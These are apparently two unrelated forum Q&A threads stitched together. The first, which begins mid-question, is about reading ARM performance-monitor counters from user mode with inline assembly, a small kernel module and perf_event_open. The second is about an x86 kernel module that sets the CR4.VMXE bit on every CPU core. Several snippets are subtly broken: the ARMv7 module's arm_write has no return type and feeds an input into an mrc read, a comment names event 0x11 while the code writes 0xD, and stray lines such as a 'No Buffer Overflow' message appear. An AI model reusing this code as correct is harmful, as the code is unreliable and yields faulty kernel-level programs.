/* All counters, including PMCCNTR_EL0, are disabled/enabled */
#define QUADD_ARMV8_PMCR_E (1 << 0)
/* Reset all event counters, not including PMCCNTR_EL0, to 0
*/
#define QUADD_ARMV8_PMCR_P (1 << 1)
/* Reset PMCCNTR_EL0 to 0 */
#define QUADD_ARMV8_PMCR_C (1 << 2)
/* Clock divider: PMCCNTR_EL0 counts every clock cycle/every 64 clock cycles */
#define QUADD_ARMV8_PMCR_D (1 << 3)
/* Export of events is disabled/enabled */
#define QUADD_ARMV8_PMCR_X (1 << 4)
/* Disable cycle counter, PMCCNTR_EL0 when event counting is prohibited */
#define QUADD_ARMV8_PMCR_DP (1 << 5)
/* Long cycle count enable */
#define QUADD_ARMV8_PMCR_LC (1 << 6)
static inline unsigned int armv8_pmu_pmcr_read(void)
{
unsigned int val;
/* Read Performance Monitors Control Register */
asm volatile("mrs %0, pmcr_el0" : "=r" (val));
return val;
}
static inline void armv8_pmu_pmcr_write(unsigned int val)
{
asm volatile("msr pmcr_el0, %0" : :"r" (val & QUADD_ARMV8_PMCR_WR_MASK));
}
static void enable_all_counters(void)
{
unsigned int val;
/* Enable all counters */
val = armv8_pmu_pmcr_read();
val |= QUADD_ARMV8_PMCR_E | QUADD_ARMV8_PMCR_X;
armv8_pmu_pmcr_write(val);
}
static void reset_all_counters(void)
{
unsigned int val;
val = armv8_pmu_pmcr_read();
val |= QUADD_ARMV8_PMCR_P | QUADD_ARMV8_PMCR_C;
armv8_pmu_pmcr_write(val);
}
static void readticks(unsigned int *result)
{
struct timeval t;
unsigned int cc;
unsigned int val;
if (!enabled) {
reset_all_counters();
enable_all_counters();
enabled = 1;
}
cc = armv8_pmu_pmcr_read();
gettimeofday(&t,(struct timezone *) 0);
result[0] = cc;
result[1] = t.tv_usec;
result[2] = t.tv_sec;
}
But it gives "Illegal instruction" as error while I am trying profiling. Can anyone help me to change the above code for cortex-a53?
You need to enable the PMU for user mode. Here is the kernel module I wrote for it(For ARM V7 in Raspberry Pi 2):
/* Module source file 'module.c'. */
#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>
arm_write(unsigned long val)
{
//Enabling both read and write - note difference between mcr and mrc
asm volatile("mrc p15, 0, %0, c9, c14, 0" :: "r"(1));
asm volatile("mcr p15, 0, %0, c9, c14, 0" :: "r"(1));
}
static int enabler(void)
{
unsigned long value = 1;
printk(KERN_INFO "Enabling PMU usermode.\n");
arm_write(value);
return 0;
}
static void end(void)
{
printk(KERN_INFO "module unloaded.\n");
}
module_init(enabler);
module_exit(end);
MODULE_AUTHOR("Sama");
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Blahblah");
This will enable user mode access to the PMU. once you compiled it , you need to enable the PMU counters as follow:
int main(int argc, char **argv){
int enable_divider =1;
int do_reset=1;
int value = 1;
// peform reset:
if (do_reset) {
value |= 2; // reset all counters to zero.
value |= 4; // reset cycle counter to zero.
}
if (enable_divider)
value |= 8; // enable "by 64" divider for CCNT. You really do not want to get all cycle count. This will increment the counter by 1 for every 64 cpu cycle.
value |= 16;
// program the performance-counter control-register with mask constructed above
asm volatile ("MCR p15, 0, %0, c9, c12, 0\t\n" :: "r"(value));
// enable all counters:
asm volatile ("MCR p15, 0, %0, c9, c12, 1\t\n" :: "r"(0x8000000f));
// clear overflows:
asm volatile ("MCR p15, 0, %0, c9, c12, 3\t\n" :: "r"(0x80000001));
// Select individual counter (0)
asm volatile ("MCR p15, 0, %0, c9 , c12 , 5\t\n":: "r"(0x00));
// Write event (0x11 = Cycle count)
asm volatile ("MCR p15, 0, %0, c9 , c13 , 1\t\n":: "r"(0xD));
printf("Hi");
unsigned int output;
// Read current event counter
asm volatile ("MRC p15, 0, %0, c9 , c13 , 2\t\n": "=r"(output));
printf("Event count 0: %ul\n", output);
printf("Normal Execution, No Buffer Overflow Occurred.\n");
return 0;
}
However unfortunately what you get is not only your program cpu cycle, but entire system cpu cycle!. So what I recommend is to use perf.
Write your asm code in an inline assembly code in C and then put it like this:
int dummya(int z, int b){
//This is my function you need to change it for yourself
struct perf_event_attr pe;
long long count;
int fd;
memset(&pe, 0, sizeof(struct perf_event_attr));
pe.type = PERF_TYPE_HARDWARE;
pe.size = sizeof(struct perf_event_attr);
pe.config = PERF_COUNT_HW_CPU_CYCLES;
pe.disabled = 1;
pe.exclude_kernel = 1;
pe.exclude_hv = 1;
fd = perf_event_open(&pe, 0, -1, -1, 0);
if (fd == -1) {
fprintf(stderr, "Error opening leader %llx\n", pe.config);
exit(EXIT_FAILURE);
}
ioctl(fd, PERF_EVENT_IOC_RESET, 0);
ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
//From here the counter starts.
asm("Your ASM Codes");
asm("Your ASM Codes");
asm("Your ASM Codes");
asm("Your ASM Codes");
asm("Your ASM Codes");
asm("Your ASM Codes");
asm("Your ASM Codes");
asm("Your ASM Codes");
//Disabling Counter
ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
read(fd, &count, sizeof(long long));
printf("%lld\n", count);
close(fd);
return 5;
}
And be advised you need a new kernels to access the Perf driver.
The following simple kernel module sets the 13th bit of the cr4 register (CR4.VMXE) once it is loaded and clears the bit on exit.
vmx.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
MODULE_LICENSE("GPL");
static inline uint64_t getcr4(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr4, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void setcr4(register uint64_t val) {
asm volatile (
"movq %0, %%cr4\n"
:
:"r"(val)
);
}
static int __init init_routine(void) {
uint64_t cr4 = getcr4();
printk(KERN_INFO "VTX Test loaded: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
cr4 |= (1 << 13);
setcr4(cr4);
cr4 = getcr4();
printk(KERN_INFO "cr4: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
return 0;
}
static void __exit exit_routine(void) {
uint64_t cr4 = getcr4();
printk(KERN_INFO "cr4: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
cr4 &= ~(1 << 13);
setcr4(cr4);
cr4 = getcr4();
printk(KERN_INFO "VTX Test exited: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
}
module_init(init_routine);
module_exit(exit_routine);
Makefile
obj-m += vmx.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
To run the module I use make clean && make && sudo insmod vmx.ko && sudo rmmod vmx && sudo dmesg -c. This sometimes gives me the following (expected) output
[ 2295.121537] VTX Test loaded: 1312736 (0).
[ 2295.121540] cr4: 1320928 (1).
[ 2295.123975] cr4: 1320928 (1).
[ 2295.123977] VTX Test exited: 1312736 (0).
And sometimes also the following:
[ 2296.256982] VTX Test loaded: 1320928 (1).
[ 2296.256984] cr4: 1320928 (1).
[ 2296.259481] cr4: 1312736 (0).
[ 2296.259483] VTX Test exited: 1312736 (0).
The second and third line in the secound output seem strange to me, because it seems like the modified control register cr4 has been reset after leaving init_routine. Additionally it is strange that in the first line the VMXE bit seems to be set, which doesn't really make any sense. Is this behavior normal? How can it be explained? Could there be another kernel module running which modifies CR4? This seems rather strange because I've seen several VTX implementations and they all set the VMXE bit in their initialization routine and clear the bit in their exit routine in the same fashion as in this module.
As it turns out, the problem is that the register is not modified on all CPU cores. To ensure that the modifications happen on all cores it seems to be enough to invoke on_each_cpu. Fixed code below, Makefile unchanged.
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
MODULE_LICENSE("GPL");
static inline uint64_t getcr4(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr4, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void setcr4(register uint64_t val) {
asm volatile (
"movq %0, %%cr4\n"
:
:"r"(val)
);
}
static void setvmxe(void* info) {
uint64_t cr4 = getcr4();
cr4 |= (1 << 13);
setcr4(cr4);
}
static void clearvmxe(void* info) {
uint64_t cr4 = getcr4();
cr4 &= ~(1 << 13);
setcr4(cr4);
}
static int __init init_routine(void) {
uint64_t cr4 = getcr4();
printk(KERN_INFO "VTX Test loaded: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
on_each_cpu(setvmxe, NULL, 0);
cr4 = getcr4();
printk(KERN_INFO "cr4: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
return 0;
}
static void __exit exit_routine(void) {
uint64_t cr4 = getcr4();
printk(KERN_INFO "cr4: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
on_each_cpu(clearvmxe, NULL, 0);
cr4 = getcr4();
printk(KERN_INFO "VTX Test exited: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
}
module_init(init_routine);
module_exit(exit_routine);
You probably have the kvm module (and the associated kvm-intel or kvm-amd) kernel modules loaded. These modules already manage the processor's VT state, and are likely to be very confused if you start modifying it elsewhere.
Take a look at the arch/x86/kvm directory in the kernel source to get a sense of what already exists.